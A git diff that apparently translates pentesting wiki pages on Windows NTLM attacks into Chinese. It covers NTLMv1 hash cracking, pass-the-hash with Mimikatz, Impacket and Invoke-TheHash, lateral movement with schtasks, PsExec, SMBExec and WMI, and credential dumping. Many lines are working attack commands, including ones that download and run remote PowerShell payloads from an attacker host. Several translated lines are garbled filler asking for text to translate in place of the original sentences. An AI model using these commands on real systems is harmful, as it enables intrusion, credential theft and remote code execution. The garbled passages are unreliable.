+请记住，打印机在认证期间将使用计算机帐户，而计算机帐户使用 **长且随机的密码**，您 **可能无法使用常见的字典破解**。但是 **NTLMv1** 认证 **使用 DES** ([更多信息在这里](./#ntlmv1-challenge))，因此使用一些专门用于破解 DES 的服务，您将能够破解它（例如，您可以使用 [https://crack.sh/](https://crack.sh) 或 [https://ntlmv1.com/](https://ntlmv1.com)）。
 
-Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** ([more info here](./#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) or [https://ntlmv1.com/](https://ntlmv1.com) for example).
+### 使用 hashcat 的 NTLMv1 攻击
 
-### NTLMv1 attack with hashcat
-
-NTLMv1 can also be broken with the NTLMv1 Multi Tool [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) which formats NTLMv1 messages im a method that can be broken with hashcat.
-
-The command
+NTLMv1 也可以通过 NTLMv1 多工具 [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) 破解，该工具以可以通过 hashcat 破解的方式格式化 NTLMv1 消息。
 
+命令
 ```bash
 python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
 ```
-
-would output the below:
-
+请提供您希望翻译的文本。
 ```bash
 ['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']
 
@@ -124,22 +117,16 @@ To crack with hashcat:
 To Crack with crack.sh use the following token
 NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
 ```
-
-Create a file with the contents of:
-
+请创建一个文件，内容为：
 ```bash
 727B4E35F947129E:1122334455667788
 A52B9CDEDAE86934:1122334455667788
 ```
-
-Run hashcat (distributed is best through a tool such as hashtopolis) as this will take several days otherwise.
-
+运行 hashcat（通过像 hashtopolis 这样的工具进行分布式处理是最佳选择），否则这将需要几天时间。
 ```bash
 ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
 ```
-
-In this case we know the password to this is password so we are going to cheat for demo purposes:
-
+在这种情况下，我们知道密码是 password，因此我们将为了演示目的而作弊：
 ```bash
 python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
 DESKEY1: b55d6d04e67926
@@ -148,9 +135,7 @@ DESKEY2: bcba83e6895b9d
 echo b55d6d04e67926>>des.cand
 echo bcba83e6895b9d>>des.cand
 ```
-
-We now need to use the hashcat-utilities to convert the cracked des keys into parts of the NTLM hash:
-
+我们现在需要使用 hashcat-utilities 将破解的 des 密钥转换为 NTLM 哈希的部分：
 ```bash
 ./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
 b4b9b02e6f09a9 # this is part 1
@@ -158,131 +143,111 @@ b4b9b02e6f09a9 # this is part 1
 ./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
 bd760f388b6700 # this is part 2
 ```
-
-Ginally the last part:
-
+请提供您希望翻译的具体文本内容。
 ```bash
 ./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
 
 586c # this is the last part
 ```
-
-Combine them together:
-
+请将它们结合在一起：
 ```bash
 NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 ```
+### NTLMv2 挑战
 
-### NTLMv2 Challenge
+**挑战长度为 8 字节**，并且**发送 2 个响应**：一个是**24 字节**长，另一个的长度是**可变**的。
 
-The **challenge length is 8 bytes** and **2 responses are sent**: One is **24 bytes** long and the length of the **other** is **variable**.
+**第一个响应**是通过使用**HMAC_MD5**对由**客户端和域**组成的**字符串**进行加密，并使用**NT hash**的**MD4 哈希**作为**密钥**来创建的。然后，**结果**将作为**密钥**用于使用**HMAC_MD5**对**挑战**进行加密。为此，将**添加一个 8 字节的客户端挑战**。总计：24 B。
 
-**The first response** is created by ciphering using **HMAC_MD5** the **string** composed by the **client and the domain** and using as **key** the **hash MD4** of the **NT hash**. Then, the **result** will by used as **key** to cipher using **HMAC_MD5** the **challenge**. To this, **a client challenge of 8 bytes will be added**. Total: 24 B.
+**第二个响应**是使用**多个值**（一个新的客户端挑战，一个**时间戳**以避免**重放攻击**...）创建的。
 
-The **second response** is created using **several values** (a new client challenge, a **timestamp** to avoid **replay attacks**...)
-
-If you have a **pcap that has captured a successful authentication process**, you can follow this guide to get the domain, username , challenge and response and try to creak the password: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://www.801labs.org/research-portal/post/cracking-an-ntlmv2-hash/)
+如果您有一个**捕获了成功身份验证过程的 pcap**，您可以按照本指南获取域、用户名、挑战和响应，并尝试破解密码：[https://research.801labs.org/cracking-an-ntlmv2-hash/](https://www.801labs.org/research-portal/post/cracking-an-ntlmv2-hash/)
 
 ## Pass-the-Hash
 
-**Once you have the hash of the victim**, you can use it to **impersonate** it.\
-You need to use a **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.
+**一旦您拥有受害者的哈希值**，您可以使用它来**冒充**受害者。\
+您需要使用一个**工具**，该工具将**使用**该**哈希**执行**NTLM 身份验证**，**或者**您可以创建一个新的**sessionlogon**并将该**哈希**注入到**LSASS**中，这样当任何**NTLM 身份验证被执行**时，该**哈希将被使用**。最后一个选项就是 mimikatz 所做的。
 
-**Please, remember that you can perform Pass-the-Hash attacks also using Computer accounts.**
+**请记住，您也可以使用计算机帐户执行 Pass-the-Hash 攻击。**
 
 ### **Mimikatz**
 
-**Needs to be run as administrator**
-
+**需要以管理员身份运行**
 ```bash
 Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
 ```
+这将启动一个进程，该进程将属于启动 mimikatz 的用户，但在 LSASS 内部，保存的凭据是 mimikatz 参数中的内容。然后，您可以像该用户一样访问网络资源（类似于 `runas /netonly` 技巧，但您不需要知道明文密码）。
 
-This will launch a process that will belongs to the users that have launch mimikatz but internally in LSASS the saved credentials are the ones inside the mimikatz parameters. Then, you can access to network resources as if you where that user (similar to the `runas /netonly` trick but you don't need to know the plain-text password).
+### 从 Linux 进行 Pass-the-Hash
 
-### Pass-the-Hash from linux
+您可以使用 Linux 从 Windows 机器上获得代码执行。\
+[**访问此处了解如何操作。**](https://github.com/carlospolop/hacktricks/blob/master/windows/ntlm/broken-reference/README.md)
 
-You can obtain code execution in Windows machines using Pass-the-Hash from Linux.\
-[**Access here to learn how to do it.**](https://github.com/carlospolop/hacktricks/blob/master/windows/ntlm/broken-reference/README.md)
+### Impacket Windows 编译工具
 
-### Impacket Windows compiled tools
-
-You can download[ impacket binaries for Windows here](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries).
+您可以在此处下载[ impacket Windows 二进制文件](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries)。
 
 - **psexec_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
 - **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
-- **atexec.exe** (In this case you need to specify a command, cmd.exe and powershell.exe are not valid to obtain an interactive shell)`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
-- There are several more Impacket binaries...
+- **atexec.exe**（在这种情况下，您需要指定一个命令，cmd.exe 和 powershell.exe 不是有效的以获得交互式 shell）`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
+- 还有更多 Impacket 二进制文件...
 
 ### Invoke-TheHash
 
-You can get the powershell scripts from here: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)
+您可以从这里获取 powershell 脚本：[https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)
 
 #### Invoke-SMBExec
-
 ```bash
 Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
 ```
-
 #### Invoke-WMIExec
-
 ```bash
 Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
 ```
-
 #### Invoke-SMBClient
-
 ```bash
 Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
 ```
-
 #### Invoke-SMBEnum
-
 ```bash
 Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
 ```
-
 #### Invoke-TheHash
 
-This function is a **mix of all the others**. You can pass **several hosts**, **exclude** someones and **select** the **option** you want to use (_SMBExec, WMIExec, SMBClient, SMBEnum_). If you select **any** of **SMBExec** and **WMIExec** but you **don't** give any _**Command**_ parameter it will just **check** if you have **enough permissions**.
-
+这个功能是**所有其他功能的混合**。您可以传递**多个主机**，**排除**某些主机，并**选择**您想要使用的**选项**（_SMBExec, WMIExec, SMBClient, SMBEnum_）。如果您选择**任何**的**SMBExec**和**WMIExec**但您**没有**提供任何_**Command**_参数，它将仅仅**检查**您是否拥有**足够的权限**。
 ```
 Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0
 ```
-
 ### [Evil-WinRM Pass the Hash](../../network-services-pentesting/5985-5986-pentesting-winrm.md#using-evil-winrm)
 
 ### Windows Credentials Editor (WCE)
 
-**Needs to be run as administrator**
-
-This tool will do the same thing as mimikatz (modify LSASS memory).
+**需要以管理员身份运行**
 
+此工具将执行与mimikatz相同的操作（修改LSASS内存）。
 ```
 wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 ```
-
-### Manual Windows remote execution with username and password
+### 手动Windows远程执行用户名和密码
 
 {{#ref}}
 ../lateral-movement/
 {{#endref}}
 
-## Extracting credentials from a Windows Host
+## 从Windows主机提取凭据
 
-**For more information about** [**how to obtain credentials from a Windows host you should read this page**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.**
+**有关如何从Windows主机获取凭据的更多信息，请阅读此页面** [**如何获取Windows主机的凭据**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**。**
 
-## NTLM Relay and Responder
+## NTLM中继和Responder
 
-**Read more detailed guide on how to perform those attacks here:**
+**在这里阅读有关如何执行这些攻击的更详细指南：**
 
 {{#ref}}
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
-## Parse NTLM challenges from a network capture
+## 从网络捕获中解析NTLM挑战
 
-**You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)
+**您可以使用** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/ntlm/atexec.md b/src/windows-hardening/ntlm/atexec.md
index 3829b036f..344c7bfeb 100644
--- a/src/windows-hardening/ntlm/atexec.md
+++ b/src/windows-hardening/ntlm/atexec.md
@@ -2,16 +2,13 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## How Does it works
-
-At allows to schedule tasks in hosts where you know username/(password/Hash). So, you can use it to execute commands in other hosts and get the output.
+## 它是如何工作的
 
+At 允许在你知道用户名/(密码/哈希)的主机上调度任务。因此，你可以用它在其他主机上执行命令并获取输出。
 ```
 At \\victim 11:00:00PM shutdown -r
 ```
-
-Using schtasks you need first to create the task and then call it:
-
+使用 schtasks，您需要首先创建任务，然后调用它：
 ```bash
 schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
 schtasks /run /tn <TASK_NAME> /S <VICTIM>
@@ -21,14 +18,10 @@ schtasks /run /tn <TASK_NAME> /S <VICTIM>
 schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
 schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
 ```
-
-You can also use [SharpLateral](https://github.com/mertdas/SharpLateral):
-
+您还可以使用 [SharpLateral](https://github.com/mertdas/SharpLateral)：
 ```bash
 SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
 ```
-
-More information about the [**use of schtasks with silver tickets here**](../active-directory-methodology/silver-ticket.md#host).
+有关[**使用 schtasks 和银票的更多信息在这里**](../active-directory-methodology/silver-ticket.md#host)。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
index 3aea077ca..248aa3cef 100644
--- a/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
+++ b/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)**
+**查看所有来自 [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) 的精彩想法** 
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/ntlm/psexec-and-winexec.md b/src/windows-hardening/ntlm/psexec-and-winexec.md
index 47a06f34b..4762b4bcc 100644
--- a/src/windows-hardening/ntlm/psexec-and-winexec.md
+++ b/src/windows-hardening/ntlm/psexec-and-winexec.md
@@ -4,52 +4,49 @@
 
 <figure><img src="/images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
 
-## How do they work
+## 它们是如何工作的
 
-The process is outlined in the steps below, illustrating how service binaries are manipulated to achieve remote execution on a target machine via SMB:
+该过程在以下步骤中概述，说明如何操纵服务二进制文件以通过 SMB 在目标机器上实现远程执行：
 
-1. **Copying of a service binary to the ADMIN$ share over SMB** is performed.
-2. **Creation of a service on the remote machine** is done by pointing to the binary.
-3. The service is **started remotely**.
-4. Upon exit, the service is **stopped, and the binary is deleted**.
+1. **通过 SMB 复制服务二进制文件到 ADMIN$ 共享**。
+2. **在远程机器上创建服务**，指向该二进制文件。
+3. 服务被 **远程启动**。
+4. 退出时，服务被 **停止，二进制文件被删除**。
 
-### **Process of Manually Executing PsExec**
+### **手动执行 PsExec 的过程**
 
-Assuming there is an executable payload (created with msfvenom and obfuscated using Veil to evade antivirus detection), named 'met8888.exe', representing a meterpreter reverse_http payload, the following steps are taken:
+假设有一个可执行有效载荷（使用 msfvenom 创建并使用 Veil 混淆以规避防病毒检测），名为 'met8888.exe'，代表一个 meterpreter reverse_http 有效载荷，采取以下步骤：
 
-- **Copying the binary**: The executable is copied to the ADMIN$ share from a command prompt, though it may be placed anywhere on the filesystem to remain concealed.
+- **复制二进制文件**：可执行文件从命令提示符复制到 ADMIN$ 共享，尽管它可以放置在文件系统的任何位置以保持隐蔽。
 
-- **Creating a service**: Utilizing the Windows `sc` command, which allows for querying, creating, and deleting Windows services remotely, a service named "meterpreter" is created to point to the uploaded binary.
+- **创建服务**：利用 Windows `sc` 命令，该命令允许远程查询、创建和删除 Windows 服务，创建一个名为 "meterpreter" 的服务，指向上传的二进制文件。
 
-- **Starting the service**: The final step involves starting the service, which will likely result in a "time-out" error due to the binary not being a genuine service binary and failing to return the expected response code. This error is inconsequential as the primary goal is the binary's execution.
+- **启动服务**：最后一步涉及启动服务，这可能会导致 "超时" 错误，因为该二进制文件不是一个真正的服务二进制文件，未能返回预期的响应代码。此错误无关紧要，因为主要目标是执行该二进制文件。
 
-Observation of the Metasploit listener will reveal that the session has been initiated successfully.
+观察 Metasploit 监听器将显示会话已成功启动。
 
-[Learn more about the `sc` command](https://technet.microsoft.com/en-us/library/bb490995.aspx).
+[了解更多关于 `sc` 命令的信息](https://technet.microsoft.com/en-us/library/bb490995.aspx)。
 
-Find moe detailed steps in: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+在此查找更详细的步骤: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
-**You could also use the Windows Sysinternals binary PsExec.exe:**
+**您还可以使用 Windows Sysinternals 二进制文件 PsExec.exe：**
 
 ![](<../../images/image (165).png>)
 
-You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
-
+您还可以使用 [**SharpLateral**](https://github.com/mertdas/SharpLateral)：
 ```
 SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
 ```
-
 <figure><img src="/images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/ntlm/smbexec.md b/src/windows-hardening/ntlm/smbexec.md
index ea27ebb13..d3b8d7e4e 100644
--- a/src/windows-hardening/ntlm/smbexec.md
+++ b/src/windows-hardening/ntlm/smbexec.md
@@ -2,40 +2,35 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## How it Works
+## 工作原理
 
-**Smbexec** is a tool used for remote command execution on Windows systems, similar to **Psexec**, but it avoids placing any malicious files on the target system.
+**Smbexec** 是一个用于在 Windows 系统上进行远程命令执行的工具，类似于 **Psexec**，但它避免在目标系统上放置任何恶意文件。
 
-### Key Points about **SMBExec**
-
-- It operates by creating a temporary service (for example, "BTOBTO") on the target machine to execute commands via cmd.exe (%COMSPEC%), without dropping any binaries.
-- Despite its stealthy approach, it does generate event logs for each command executed, offering a form of non-interactive "shell".
-- The command to connect using **Smbexec** looks like this:
+### 关于 **SMBExec** 的关键点
 
+- 它通过在目标机器上创建一个临时服务（例如，“BTOBTO”）来执行命令，通过 cmd.exe (%COMSPEC%)，而不放置任何二进制文件。
+- 尽管采用隐蔽的方法，但它确实为每个执行的命令生成事件日志，提供了一种非交互式的“shell”。
+- 使用 **Smbexec** 连接的命令如下所示：
 ```bash
 smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
 ```
+### 执行无二进制文件的命令
 
-### Executing Commands Without Binaries
+- **Smbexec** 通过服务 binPaths 直接执行命令，消除了在目标上需要物理二进制文件的需求。
+- 这种方法对于在 Windows 目标上执行一次性命令非常有用。例如，将其与 Metasploit 的 `web_delivery` 模块配对，可以执行针对 PowerShell 的反向 Meterpreter 有效载荷。
+- 通过在攻击者的机器上创建一个远程服务，并将 binPath 设置为通过 cmd.exe 运行提供的命令，可以成功执行有效载荷，实现回调和有效载荷执行与 Metasploit 监听器，即使发生服务响应错误。
 
-- **Smbexec** enables direct command execution through service binPaths, eliminating the need for physical binaries on the target.
-- This method is useful for executing one-time commands on a Windows target. For instance, pairing it with Metasploit's `web_delivery` module allows for the execution of a PowerShell-targeted reverse Meterpreter payload.
-- By creating a remote service on the attacker's machine with binPath set to run the provided command through cmd.exe, it's possible to execute the payload successfully, achieving callback and payload execution with the Metasploit listener, even if service response errors occur.
-
-### Commands Example
-
-Creating and starting the service can be accomplished with the following commands:
+### 命令示例
 
+创建和启动服务可以通过以下命令完成：
 ```bash
 sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
 sc start [ServiceName]
 ```
+有关更多详细信息，请查看 [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
-FOr further details check [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
-
-## References
+## 参考文献
 
 - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/ntlm/winrm.md b/src/windows-hardening/ntlm/winrm.md
index 44cca4241..7232563a2 100644
--- a/src/windows-hardening/ntlm/winrm.md
+++ b/src/windows-hardening/ntlm/winrm.md
@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-For information about [**WinRM read this page**](../../network-services-pentesting/5985-5986-pentesting-winrm.md).
+有关[**WinRM的信息，请阅读此页面**](../../network-services-pentesting/5985-5986-pentesting-winrm.md)。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/ntlm/wmiexec.md b/src/windows-hardening/ntlm/wmiexec.md
index f893fbae1..ff2bd113c 100644
--- a/src/windows-hardening/ntlm/wmiexec.md
+++ b/src/windows-hardening/ntlm/wmiexec.md
@@ -2,19 +2,18 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## How It Works Explained
+## 工作原理解释
 
-Processes can be opened on hosts where the username and either password or hash are known through the use of WMI. Commands are executed using WMI by Wmiexec, providing a semi-interactive shell experience.
+可以在已知用户名和密码或哈希的主机上通过使用 WMI 打开进程。通过 Wmiexec 使用 WMI 执行命令，提供半交互式的 shell 体验。
 
-**dcomexec.py:** Utilizing different DCOM endpoints, this script offers a semi-interactive shell akin to wmiexec.py, specifically leveraging the ShellBrowserWindow DCOM object. It currently supports MMC20. Application, Shell Windows, and Shell Browser Window objects. (source: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
+**dcomexec.py:** 利用不同的 DCOM 端点，该脚本提供类似于 wmiexec.py 的半交互式 shell，特别利用 ShellBrowserWindow DCOM 对象。它目前支持 MMC20。应用程序、Shell Windows 和 Shell Browser Window 对象。（来源：[Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)）
 
-## WMI Fundamentals
+## WMI 基础知识
 
-### Namespace
-
-Structured in a directory-style hierarchy, WMI's top-level container is \root, under which additional directories, referred to as namespaces, are organized.
-Commands to list namespaces:
+### 命名空间
 
+WMI 的顶级容器是 \root，按照目录样式的层次结构组织，下面有其他目录，称为命名空间。
+列出命名空间的命令：
 ```bash
 # Retrieval of Root namespaces
 gwmi -namespace "root" -Class "__Namespace" | Select Name
@@ -25,36 +24,28 @@ Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | s
 # Listing of namespaces within "root\cimv2"
 Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
 ```
-
-Classes within a namespace can be listed using:
-
+在命名空间内可以使用以下命令列出类：
 ```bash
 gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
 gwmi -Namespace "root/microsoft" -List -Recurse
 ```
+### **类**
 
-### **Classes**
-
-Knowing a WMI class name, such as win32_process, and the namespace it resides in is crucial for any WMI operation.
-Commands to list classes beginning with `win32`:
-
+知道 WMI 类名，例如 win32_process，以及它所在的命名空间，对于任何 WMI 操作都是至关重要的。
+列出以 `win32` 开头的类的命令：
 ```bash
 Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
 gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
 ```
-
-Invocation of a class:
-
+调用类：
 ```bash
 # Defaults to "root/cimv2" when namespace isn't specified
 Get-WmiObject -Class win32_share
 Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
 ```
+### 方法
 
-### Methods
-
-Methods, which are one or more executable functions of WMI classes, can be executed.
-
+方法是一个或多个可执行的 WMI 类函数，可以被执行。
 ```bash
 # Class loading, method listing, and execution
 $c = [wmiclass]"win32_share"
@@ -66,13 +57,11 @@ $c.methods
 # Method listing and invocation
 Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
 ```
+## WMI 枚举
 
-## WMI Enumeration
-
-### WMI Service Status
-
-Commands to verify if the WMI service is operational:
+### WMI 服务状态
 
+验证 WMI 服务是否正常运行的命令：
 ```bash
 # WMI service status check
 Get-Service Winmgmt
@@ -80,18 +69,14 @@ Get-Service Winmgmt
 # Via CMD
 net start | findstr "Instrumentation"
 ```
+### 系统和进程信息
 
-### System and Process Information
-
-Gathering system and process information through WMI:
-
+通过 WMI 收集系统和进程信息：
 ```bash
 Get-WmiObject -ClassName win32_operatingsystem | select * | more
 Get-WmiObject win32_process | Select Name, Processid
 ```
-
-For attackers, WMI is a potent tool for enumerating sensitive data about systems or domains.
-
+对于攻击者来说，WMI 是一个强大的工具，用于枚举有关系统或域的敏感数据。
 ```bash
 wmic computerystem list full /format:list
 wmic process list /format:list
@@ -100,32 +85,26 @@ wmic useraccount list /format:list
 wmic group list /format:list
 wmic sysaccount list /format:list
 ```
+通过仔细构造命令，可以远程查询 WMI 以获取特定信息，例如本地管理员或登录用户。
 
-Remote querying of WMI for specific information, such as local admins or logged-on users, is feasible with careful command construction.
+### **手动远程 WMI 查询**
 
-### **Manual Remote WMI Querying**
-
-Stealthy identification of local admins on a remote machine and logged-on users can be achieved through specific WMI queries. `wmic` also supports reading from a text file to execute commands on multiple nodes simultaneously.
-
-To remotely execute a process over WMI, such as deploying an Empire agent, the following command structure is employed, with successful execution indicated by a return value of "0":
+可以通过特定的 WMI 查询隐秘地识别远程计算机上的本地管理员和登录用户。 `wmic` 还支持从文本文件读取，以便同时在多个节点上执行命令。
 
+要通过 WMI 远程执行进程，例如部署 Empire 代理，使用以下命令结构，成功执行的返回值为 "0"：
 ```bash
 wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
 ```
+这个过程展示了WMI的远程执行和系统枚举能力，突显了它在系统管理和渗透测试中的实用性。
 
-This process illustrates WMI's capability for remote execution and system enumeration, highlighting its utility for both system administration and penetration testing.
-
-## References
+## 参考文献
 
 - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
-## Automatic Tools
+## 自动化工具
 
 - [**SharpLateral**](https://github.com/mertdas/SharpLateral):
-
 ```bash
 SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/stealing-credentials/README.md b/src/windows-hardening/stealing-credentials/README.md
index a823eff48..91a357f77 100644
--- a/src/windows-hardening/stealing-credentials/README.md
+++ b/src/windows-hardening/stealing-credentials/README.md
@@ -1,9 +1,8 @@
-# Stealing Windows Credentials
+# 窃取Windows凭据
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Credentials Mimikatz
-
+## 凭据Mimikatz
 ```bash
 #Elevate Privileges to extract the credentials
 privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
@@ -17,23 +16,19 @@ lsadump::sam
 #One liner
